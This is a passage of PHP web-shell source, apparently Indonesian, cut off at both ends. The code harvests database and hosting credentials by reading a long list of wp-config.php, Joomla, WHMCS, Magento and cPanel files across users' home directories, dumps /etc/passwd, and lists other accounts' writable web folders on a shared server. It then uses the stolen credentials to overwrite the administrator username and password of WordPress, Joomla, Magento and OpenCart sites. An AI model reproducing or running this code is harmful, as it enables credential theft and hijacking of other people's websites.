"WordPressBlog", "/home/{$user_cox}/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home/{$user_cox}/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home/{$user_cox}/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home/{$user_cox}/public_html/beta/wp-config.php" => "WordPressBeta", "/home/{$user_cox}/public_html/Beta/wp-config.php" => "WordPressBeta", "/home/{$user_cox}/public_html/BETA/wp-config.php" => "WordPressBeta", "/home/{$user_cox}/public_html/PRESS/wp-config.php" => "WordPressPress", "/home/{$user_cox}/public_html/Press/wp-config.php" => "WordPressPress", "/home/{$user_cox}/public_html/press/wp-config.php" => "WordPressPress", "/home/{$user_cox}/public_html/Wp/wp-config.php" => "WordPressWp", "/home/{$user_cox}/public_html/wp/wp-config.php" => "WordPressWp", "/home/{$user_cox}/public_html/WP/wp-config.php" => "WordPressWP", "/home/{$user_cox}/public_html/portal/wp-config.php" => "WordPressPortal", "/home/{$user_cox}/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home/{$user_cox}/public_html/Portal/wp-config.php" => "WordPressPortal", "/home1/{$user_cox}/.my.cnf" => "cpanel", "/home1/{$user_cox}/.accesshash" => "WHM-accesshash", "/home1/{$user_cox}/public_html/bw-configs/config.ini" => "BosWeb", "/home1/{$user_cox}/public_html/config/koneksi.php" => "Lokomedia", "/home1/{$user_cox}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home1/{$user_cox}/public_html/clientarea/configuration.php" => "WHMCS", "/home1/{$user_cox}/public_html/whmcs/configuration.php" => "WHMCS", "/home1/{$user_cox}/public_html/forum/config.php" => "phpBB", "/home1/{$user_cox}/public_html/sites/default/settings.php" => "Drupal", "/home1/{$user_cox}/public_html/config/settings.inc.php" => "PrestaShop", "/home1/{$user_cox}/public_html/app/etc/local.xml" => "Magento", "/home1/{$user_cox}/public_html/admin/config.php" => "OpenCart", "/home1/{$user_cox}/public_html/slconfig.php" => "Sitelok", "/home1/{$user_cox}/public_html/application/config/database.php" => "Ellislab", "/home1/{$user_cox}/public_html/whm/configuration.php" => "WHMCS", "/home1/{$user_cox}/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home1/{$user_cox}/public_html/central/configuration.php" => "WHM Central", "/home1/{$user_cox}/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home1/{$user_cox}/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home1/{$user_cox}/public_html/submitticket.php" => "WHMCS", "/home1/{$user_cox}/public_html/configuration.php" => "Joomla", "/home1/{$user_cox}/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home1/{$user_cox}/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home1/{$user_cox}/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home1/{$user_cox}/public_html/Home/configuration.php" => "JoomlaHome", "/home1/{$user_cox}/public_html/HOME/configuration.php" => "JoomlaHome", "/home1/{$user_cox}/public_html/home/configuration.php" => "JoomlaHome", "/home1/{$user_cox}/public_html/NEW/configuration.php" => "JoomlaNew", "/home1/{$user_cox}/public_html/New/configuration.php" => "JoomlaNew", "/home1/{$user_cox}/public_html/new/configuration.php" => "JoomlaNew", "/home1/{$user_cox}/public_html/News/configuration.php" => "JoomlaNews", "/home1/{$user_cox}/public_html/NEWS/configuration.php" => "JoomlaNews", "/home1/{$user_cox}/public_html/news/configuration.php" => "JoomlaNews", "/home1/{$user_cox}/public_html/Cms/configuration.php" => "JoomlaCms", "/home1/{$user_cox}/public_html/CMS/configuration.php" => "JoomlaCms", "/home1/{$user_cox}/public_html/cms/configuration.php" => "JoomlaCms", "/home1/{$user_cox}/public_html/Main/configuration.php" => "JoomlaMain", "/home1/{$user_cox}/public_html/MAIN/configuration.php" => "JoomlaMain", "/home1/{$user_cox}/public_html/main/configuration.php" => "JoomlaMain", "/home1/{$user_cox}/public_html/Blog/configuration.php" => "JoomlaBlog", "/home1/{$user_cox}/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home1/{$user_cox}/public_html/blog/configuration.php" => "JoomlaBlog", "/home1/{$user_cox}/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home1/{$user_cox}/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home1/{$user_cox}/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home1/{$user_cox}/public_html/beta/configuration.php" => "JoomlaBeta", "/home1/{$user_cox}/public_html/Beta/configuration.php" => "JoomlaBeta", "/home1/{$user_cox}/public_html/BETA/configuration.php" => "JoomlaBeta", "/home1/{$user_cox}/public_html/PRESS/configuration.php" => "JoomlaPress", "/home1/{$user_cox}/public_html/Press/configuration.php" => "JoomlaPress", "/home1/{$user_cox}/public_html/press/configuration.php" => "JoomlaPress", "/home1/{$user_cox}/public_html/Wp/configuration.php" => "JoomlaWp", "/home1/{$user_cox}/public_html/wp/configuration.php" => "JoomlaWp", "/home1/{$user_cox}/public_html/WP/configuration.php" => "JoomlaWP", "/home1/{$user_cox}/public_html/portal/configuration.php" => "JoomlaPortal", "/home1/{$user_cox}/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home1/{$user_cox}/public_html/Portal/configuration.php" => "JoomlaPortal", "/home1/{$user_cox}/public_html/wp-config.php" => "WordPress", "/home1/{$user_cox}/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home1/{$user_cox}/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home1/{$user_cox}/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home1/{$user_cox}/public_html/Home/wp-config.php" => "WordPressHome", "/home1/{$user_cox}/public_html/HOME/wp-config.php" => "WordPressHome", "/home1/{$user_cox}/public_html/home/wp-config.php" => "WordPressHome", "/home1/{$user_cox}/public_html/NEW/wp-config.php" => "WordPressNew", "/home1/{$user_cox}/public_html/New/wp-config.php" => "WordPressNew", "/home1/{$user_cox}/public_html/new/wp-config.php" => "WordPressNew", "/home1/{$user_cox}/public_html/News/wp-config.php" => "WordPressNews", "/home1/{$user_cox}/public_html/NEWS/wp-config.php" => "WordPressNews", "/home1/{$user_cox}/public_html/news/wp-config.php" => "WordPressNews", "/home1/{$user_cox}/public_html/Cms/wp-config.php" => "WordPressCms", "/home1/{$user_cox}/public_html/CMS/wp-config.php" => "WordPressCms", "/home1/{$user_cox}/public_html/cms/wp-config.php" => "WordPressCms", "/home1/{$user_cox}/public_html/Main/wp-config.php" => "WordPressMain", "/home1/{$user_cox}/public_html/MAIN/wp-config.php" => "WordPressMain", "/home1/{$user_cox}/public_html/main/wp-config.php" => "WordPressMain", "/home1/{$user_cox}/public_html/Blog/wp-config.php" => "WordPressBlog", "/home1/{$user_cox}/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home1/{$user_cox}/public_html/blog/wp-config.php" => "WordPressBlog", "/home1/{$user_cox}/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home1/{$user_cox}/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home1/{$user_cox}/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home1/{$user_cox}/public_html/beta/wp-config.php" => "WordPressBeta", "/home1/{$user_cox}/public_html/Beta/wp-config.php" => "WordPressBeta", "/home1/{$user_cox}/public_html/BETA/wp-config.php" => "WordPressBeta", "/home1/{$user_cox}/public_html/PRESS/wp-config.php" => "WordPressPress", "/home1/{$user_cox}/public_html/Press/wp-config.php" => "WordPressPress", "/home1/{$user_cox}/public_html/press/wp-config.php" => "WordPressPress", "/home1/{$user_cox}/public_html/Wp/wp-config.php" => "WordPressWp", "/home1/{$user_cox}/public_html/wp/wp-config.php" => "WordPressWp", "/home1/{$user_cox}/public_html/WP/wp-config.php" => "WordPressWP", "/home1/{$user_cox}/public_html/portal/wp-config.php" => "WordPressPortal", "/home1/{$user_cox}/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home1/{$user_cox}/public_html/Portal/wp-config.php" => "WordPressPortal", "/home2/{$user_cox}/.my.cnf" => "cpanel", "/home2/{$user_cox}/.accesshash" => "WHM-accesshash", "/home2/{$user_cox}/public_html/bw-configs/config.ini" => "BosWeb", "/home2/{$user_cox}/public_html/config/koneksi.php" => "Lokomedia", "/home2/{$user_cox}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home2/{$user_cox}/public_html/clientarea/configuration.php" => "WHMCS", "/home2/{$user_cox}/public_html/whmcs/configuration.php" => "WHMCS", "/home2/{$user_cox}/public_html/forum/config.php" => "phpBB", "/home2/{$user_cox}/public_html/sites/default/settings.php" => "Drupal", "/home2/{$user_cox}/public_html/config/settings.inc.php" => "PrestaShop", "/home2/{$user_cox}/public_html/app/etc/local.xml" => "Magento", "/home2/{$user_cox}/public_html/admin/config.php" => "OpenCart", "/home2/{$user_cox}/public_html/slconfig.php" => "Sitelok", "/home2/{$user_cox}/public_html/application/config/database.php" => "Ellislab", "/home2/{$user_cox}/public_html/whm/configuration.php" => "WHMCS", "/home2/{$user_cox}/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home2/{$user_cox}/public_html/central/configuration.php" => "WHM Central", "/home2/{$user_cox}/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home2/{$user_cox}/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home2/{$user_cox}/public_html/submitticket.php" => "WHMCS", "/home2/{$user_cox}/public_html/configuration.php" => "Joomla", "/home2/{$user_cox}/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home2/{$user_cox}/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home2/{$user_cox}/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home2/{$user_cox}/public_html/Home/configuration.php" => "JoomlaHome", "/home2/{$user_cox}/public_html/HOME/configuration.php" => "JoomlaHome", "/home2/{$user_cox}/public_html/home/configuration.php" => "JoomlaHome", "/home2/{$user_cox}/public_html/NEW/configuration.php" => "JoomlaNew", "/home2/{$user_cox}/public_html/New/configuration.php" => "JoomlaNew", "/home2/{$user_cox}/public_html/new/configuration.php" => "JoomlaNew", "/home2/{$user_cox}/public_html/News/configuration.php" => "JoomlaNews", "/home2/{$user_cox}/public_html/NEWS/configuration.php" => "JoomlaNews", "/home2/{$user_cox}/public_html/news/configuration.php" => "JoomlaNews", "/home2/{$user_cox}/public_html/Cms/configuration.php" => "JoomlaCms", "/home2/{$user_cox}/public_html/CMS/configuration.php" => "JoomlaCms", "/home2/{$user_cox}/public_html/cms/configuration.php" => "JoomlaCms", "/home2/{$user_cox}/public_html/Main/configuration.php" => "JoomlaMain", "/home2/{$user_cox}/public_html/MAIN/configuration.php" => "JoomlaMain", "/home2/{$user_cox}/public_html/main/configuration.php" => "JoomlaMain", "/home2/{$user_cox}/public_html/Blog/configuration.php" => "JoomlaBlog", "/home2/{$user_cox}/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home2/{$user_cox}/public_html/blog/configuration.php" => "JoomlaBlog", "/home2/{$user_cox}/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home2/{$user_cox}/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home2/{$user_cox}/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home2/{$user_cox}/public_html/beta/configuration.php" => "JoomlaBeta", "/home2/{$user_cox}/public_html/Beta/configuration.php" => "JoomlaBeta", "/home2/{$user_cox}/public_html/BETA/configuration.php" => "JoomlaBeta", "/home2/{$user_cox}/public_html/PRESS/configuration.php" => "JoomlaPress", "/home2/{$user_cox}/public_html/Press/configuration.php" => "JoomlaPress", "/home2/{$user_cox}/public_html/press/configuration.php" => "JoomlaPress", "/home2/{$user_cox}/public_html/Wp/configuration.php" => "JoomlaWp", "/home2/{$user_cox}/public_html/wp/configuration.php" => "JoomlaWp", "/home2/{$user_cox}/public_html/WP/configuration.php" => "JoomlaWP", "/home2/{$user_cox}/public_html/portal/configuration.php" => "JoomlaPortal", "/home2/{$user_cox}/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home2/{$user_cox}/public_html/Portal/configuration.php" => "JoomlaPortal", "/home2/{$user_cox}/public_html/wp-config.php" => "WordPress", "/home2/{$user_cox}/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home2/{$user_cox}/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home2/{$user_cox}/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home2/{$user_cox}/public_html/Home/wp-config.php" => "WordPressHome", "/home2/{$user_cox}/public_html/HOME/wp-config.php" => "WordPressHome", "/home2/{$user_cox}/public_html/home/wp-config.php" => "WordPressHome", "/home2/{$user_cox}/public_html/NEW/wp-config.php" => "WordPressNew", "/home2/{$user_cox}/public_html/New/wp-config.php" => "WordPressNew", "/home2/{$user_cox}/public_html/new/wp-config.php" => "WordPressNew", "/home2/{$user_cox}/public_html/News/wp-config.php" => "WordPressNews", "/home2/{$user_cox}/public_html/NEWS/wp-config.php" => "WordPressNews", "/home2/{$user_cox}/public_html/news/wp-config.php" => "WordPressNews", "/home2/{$user_cox}/public_html/Cms/wp-config.php" => "WordPressCms", "/home2/{$user_cox}/public_html/CMS/wp-config.php" => "WordPressCms", "/home2/{$user_cox}/public_html/cms/wp-config.php" => "WordPressCms", "/home2/{$user_cox}/public_html/Main/wp-config.php" => "WordPressMain", "/home2/{$user_cox}/public_html/MAIN/wp-config.php" => "WordPressMain", "/home2/{$user_cox}/public_html/main/wp-config.php" => "WordPressMain", "/home2/{$user_cox}/public_html/Blog/wp-config.php" => "WordPressBlog", "/home2/{$user_cox}/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home2/{$user_cox}/public_html/blog/wp-config.php" => "WordPressBlog", "/home2/{$user_cox}/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home2/{$user_cox}/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home2/{$user_cox}/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home2/{$user_cox}/public_html/beta/wp-config.php" => "WordPressBeta", "/home2/{$user_cox}/public_html/Beta/wp-config.php" => "WordPressBeta", "/home2/{$user_cox}/public_html/BETA/wp-config.php" => "WordPressBeta", "/home2/{$user_cox}/public_html/PRESS/wp-config.php" => "WordPressPress", "/home2/{$user_cox}/public_html/Press/wp-config.php" => "WordPressPress", "/home2/{$user_cox}/public_html/press/wp-config.php" => "WordPressPress", "/home2/{$user_cox}/public_html/Wp/wp-config.php" => "WordPressWp", "/home2/{$user_cox}/public_html/wp/wp-config.php" => "WordPressWp", "/home2/{$user_cox}/public_html/WP/wp-config.php" => "WordPressWP", "/home2/{$user_cox}/public_html/portal/wp-config.php" => "WordPressPortal", "/home2/{$user_cox}/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home2/{$user_cox}/public_html/Portal/wp-config.php" => "WordPressPortal", "/home3/{$user_cox}/.my.cnf" => "cpanel", "/home3/{$user_cox}/.accesshash" => "WHM-accesshash", "/home3/{$user_cox}/public_html/bw-configs/config.ini" => "BosWeb", "/home3/{$user_cox}/public_html/config/koneksi.php" => "Lokomedia", "/home3/{$user_cox}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home3/{$user_cox}/public_html/clientarea/configuration.php" => "WHMCS", "/home3/{$user_cox}/public_html/whmcs/configuration.php" => "WHMCS", "/home3/{$user_cox}/public_html/forum/config.php" => "phpBB", "/home3/{$user_cox}/public_html/sites/default/settings.php" => "Drupal", "/home3/{$user_cox}/public_html/config/settings.inc.php" => "PrestaShop", "/home3/{$user_cox}/public_html/app/etc/local.xml" => "Magento", "/home3/{$user_cox}/public_html/admin/config.php" => "OpenCart", "/home3/{$user_cox}/public_html/slconfig.php" => "Sitelok", "/home3/{$user_cox}/public_html/application/config/database.php" => "Ellislab", "/home3/{$user_cox}/public_html/whm/configuration.php" => "WHMCS", "/home3/{$user_cox}/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home3/{$user_cox}/public_html/central/configuration.php" => "WHM Central", "/home3/{$user_cox}/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home3/{$user_cox}/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home3/{$user_cox}/public_html/submitticket.php" => "WHMCS", "/home3/{$user_cox}/public_html/configuration.php" => "Joomla", "/home3/{$user_cox}/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home3/{$user_cox}/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home3/{$user_cox}/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home3/{$user_cox}/public_html/Home/configuration.php" => "JoomlaHome", "/home3/{$user_cox}/public_html/HOME/configuration.php" => "JoomlaHome", "/home3/{$user_cox}/public_html/home/configuration.php" => "JoomlaHome", "/home3/{$user_cox}/public_html/NEW/configuration.php" => "JoomlaNew", "/home3/{$user_cox}/public_html/New/configuration.php" => "JoomlaNew", "/home3/{$user_cox}/public_html/new/configuration.php" => "JoomlaNew", "/home3/{$user_cox}/public_html/News/configuration.php" => "JoomlaNews", "/home3/{$user_cox}/public_html/NEWS/configuration.php" => "JoomlaNews", "/home3/{$user_cox}/public_html/news/configuration.php" => "JoomlaNews", "/home3/{$user_cox}/public_html/Cms/configuration.php" => "JoomlaCms", "/home3/{$user_cox}/public_html/CMS/configuration.php" => "JoomlaCms", "/home3/{$user_cox}/public_html/cms/configuration.php" => "JoomlaCms", "/home3/{$user_cox}/public_html/Main/configuration.php" => "JoomlaMain", "/home3/{$user_cox}/public_html/MAIN/configuration.php" => "JoomlaMain", "/home3/{$user_cox}/public_html/main/configuration.php" => "JoomlaMain", "/home3/{$user_cox}/public_html/Blog/configuration.php" => "JoomlaBlog", "/home3/{$user_cox}/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home3/{$user_cox}/public_html/blog/configuration.php" => "JoomlaBlog", "/home3/{$user_cox}/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home3/{$user_cox}/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home3/{$user_cox}/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home3/{$user_cox}/public_html/beta/configuration.php" => "JoomlaBeta", "/home3/{$user_cox}/public_html/Beta/configuration.php" => "JoomlaBeta", "/home3/{$user_cox}/public_html/BETA/configuration.php" => "JoomlaBeta", "/home3/{$user_cox}/public_html/PRESS/configuration.php" => "JoomlaPress", "/home3/{$user_cox}/public_html/Press/configuration.php" => "JoomlaPress", "/home3/{$user_cox}/public_html/press/configuration.php" => "JoomlaPress", "/home3/{$user_cox}/public_html/Wp/configuration.php" => "JoomlaWp", "/home3/{$user_cox}/public_html/wp/configuration.php" => "JoomlaWp", "/home3/{$user_cox}/public_html/WP/configuration.php" => "JoomlaWP", "/home3/{$user_cox}/public_html/portal/configuration.php" => "JoomlaPortal", "/home3/{$user_cox}/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home3/{$user_cox}/public_html/Portal/configuration.php" => "JoomlaPortal", "/home3/{$user_cox}/public_html/wp-config.php" => "WordPress", "/home3/{$user_cox}/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home3/{$user_cox}/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home3/{$user_cox}/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home3/{$user_cox}/public_html/Home/wp-config.php" => "WordPressHome", "/home3/{$user_cox}/public_html/HOME/wp-config.php" => "WordPressHome", "/home3/{$user_cox}/public_html/home/wp-config.php" => "WordPressHome", "/home3/{$user_cox}/public_html/NEW/wp-config.php" => "WordPressNew", "/home3/{$user_cox}/public_html/New/wp-config.php" => "WordPressNew", "/home3/{$user_cox}/public_html/new/wp-config.php" => "WordPressNew", "/home3/{$user_cox}/public_html/News/wp-config.php" => "WordPressNews", "/home3/{$user_cox}/public_html/NEWS/wp-config.php" => "WordPressNews", "/home3/{$user_cox}/public_html/news/wp-config.php" => "WordPressNews", "/home3/{$user_cox}/public_html/Cms/wp-config.php" => "WordPressCms", "/home3/{$user_cox}/public_html/CMS/wp-config.php" => "WordPressCms", "/home3/{$user_cox}/public_html/cms/wp-config.php" => "WordPressCms", "/home3/{$user_cox}/public_html/Main/wp-config.php" => "WordPressMain", "/home3/{$user_cox}/public_html/MAIN/wp-config.php" => "WordPressMain", "/home3/{$user_cox}/public_html/main/wp-config.php" => "WordPressMain", "/home3/{$user_cox}/public_html/Blog/wp-config.php" => "WordPressBlog", "/home3/{$user_cox}/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home3/{$user_cox}/public_html/blog/wp-config.php" => "WordPressBlog", "/home3/{$user_cox}/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home3/{$user_cox}/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home3/{$user_cox}/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home3/{$user_cox}/public_html/beta/wp-config.php" => "WordPressBeta", "/home3/{$user_cox}/public_html/Beta/wp-config.php" => "WordPressBeta", "/home3/{$user_cox}/public_html/BETA/wp-config.php" => "WordPressBeta", "/home3/{$user_cox}/public_html/PRESS/wp-config.php" => "WordPressPress", "/home3/{$user_cox}/public_html/Press/wp-config.php" => "WordPressPress", "/home3/{$user_cox}/public_html/press/wp-config.php" => "WordPressPress", "/home3/{$user_cox}/public_html/Wp/wp-config.php" => "WordPressWp", "/home3/{$user_cox}/public_html/wp/wp-config.php" => "WordPressWp", "/home3/{$user_cox}/public_html/WP/wp-config.php" => "WordPressWP", "/home3/{$user_cox}/public_html/portal/wp-config.php" => "WordPressPortal", "/home3/{$user_cox}/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home3/{$user_cox}/public_html/Portal/wp-config.php" => "WordPressPortal"); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("cox_config/{$user_cox}-{$nama_config}.txt", "w"); fputs($file_config, $ambil_config); } } } } echo "<center><a href='?dir={$dir}/cox_config'><font color=lime>Done</font></a></center>"; } else { echo "<form method="post" action=""><center>etc/passw ( Error ? <a href='?dir={$dir}&do=passwbypass'>Bypass Here</a> )<br><textarea name="passwd" class='area' rows='15' cols='60'>
"; echo file_get_contents("/etc/passwd"); echo "</textarea><br><input type="submit" value="GassPoll"></td></tr></center>
"; } } elseif ($_GET["do"] == "jumping") { $i = 0; echo "<pre><div class='margin: 5px auto;'>"; $etc = fopen("/etc/passwd", "r"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all("/(.*?):x:/", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/{$user_idx_jump}/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir={$user_jumping_dir}'><font color=gold>{$user_jumping_dir}</font></a><br>"; if (is_writable($user_jumping_dir)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir={$user_jumping_dir}'><font color=gold>{$user_jumping_dir}</font></a><br>"; } echo $jrw; $domain_jump = file_get_contents("/etc/named.conf"); if ($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $user_jumping_url = $user_jumping_url["name"]; if ($user_jumping_url == $user_idx_jump) { echo " => ( <u>{$dj}</u> )<br>"; break; } } } } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kimcil di " . gethostbyname($_SERVER["HTTP_HOST"]) . ''; } echo "</div></pre>"; } elseif ($_GET["do"] == "auto_edit_user") { if ($_POST["hajar"]) { if (strlen($_POST["pass_baru"]) < 6 or strlen($_POST["user_baru"]) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST["user_baru"]; $pass_baru = md5($_POST["pass_baru"]); $conf = $_POST["config_dir"]; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("{$conf}/{$file_conf}")) { continue; } $config = file_get_contents("{$conf}/{$file_conf}"); if (preg_match("/JConfig|joomla/", $config)) { $dbhost = ambilkata($config, "host = '", "'"); $dbuser = ambilkata($config, "user = '", "'"); $dbpass = ambilkata($config, "password = '", "'"); $dbname = ambilkata($config, "db = '", "'"); $dbprefix = ambilkata($config, "dbprefix = '", "'"); $prefix = $dbprefix . "users"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result["id"]; $site = ambilkata($config, "sitename = '", "'"); $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Joomla<br>"; if ($site == '') { echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "Sitename => {$site}<br>"; } if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix . "users"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='{$target}/wp-login.php' target='_blank'><u>{$target}/wp-login.php</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET user_login='{$user_baru}',user_pass='{$pass_baru}' WHERE id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Wordpress<br>"; echo $url_target; if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/Magento|Mage_Core/", $config)) { $dbhost = ambilkata($config, "<host><![CDATA[", "]]></host>"); $dbuser = ambilkata($config, "<username><![CDATA[", "]]></username>"); $dbpass = ambilkata($config, "<password><![CDATA[", "]]></password>"); $dbname = ambilkata($config, "<dbname><![CDATA[", "]]></dbname>"); $dbprefix = ambilkata($config, "<table_prefix><![CDATA[", "]]></table_prefix>"); $prefix = $dbprefix . "admin_user"; $option = $dbprefix . "core_config_data"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM {$option} WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='{$target}/admin/' target='_blank'><u>{$target}/admin/</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE user_id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Magento<br>"; echo $url_target; if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) { $dbhost = ambilkata($config, "'DB_HOSTNAME', '", "'"); $dbuser = ambilkata($config, "'DB_USERNAME', '", "'"); $dbpass = ambilkata($config, "'DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "'DB_DATABASE', '", "'"); $dbprefix = ambilkata($config, "'DB_PREFIX', '", "'"); $prefix = $dbprefix . "user"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config, "HTTP_SERVER', '", "'"); if ($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='{$target}' target='_blank'><u>{$target}</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE user_id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => OpenCart<br>"; echo $url_target; if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config)) { $dbhost = ambilkata($config, "server = "", """); $dbuser = ambilkata($config, "username = "", """); $dbpass = ambilkata($config, "password = "", """); $dbname = ambilkata($config, "database = "", """); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$option} ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target 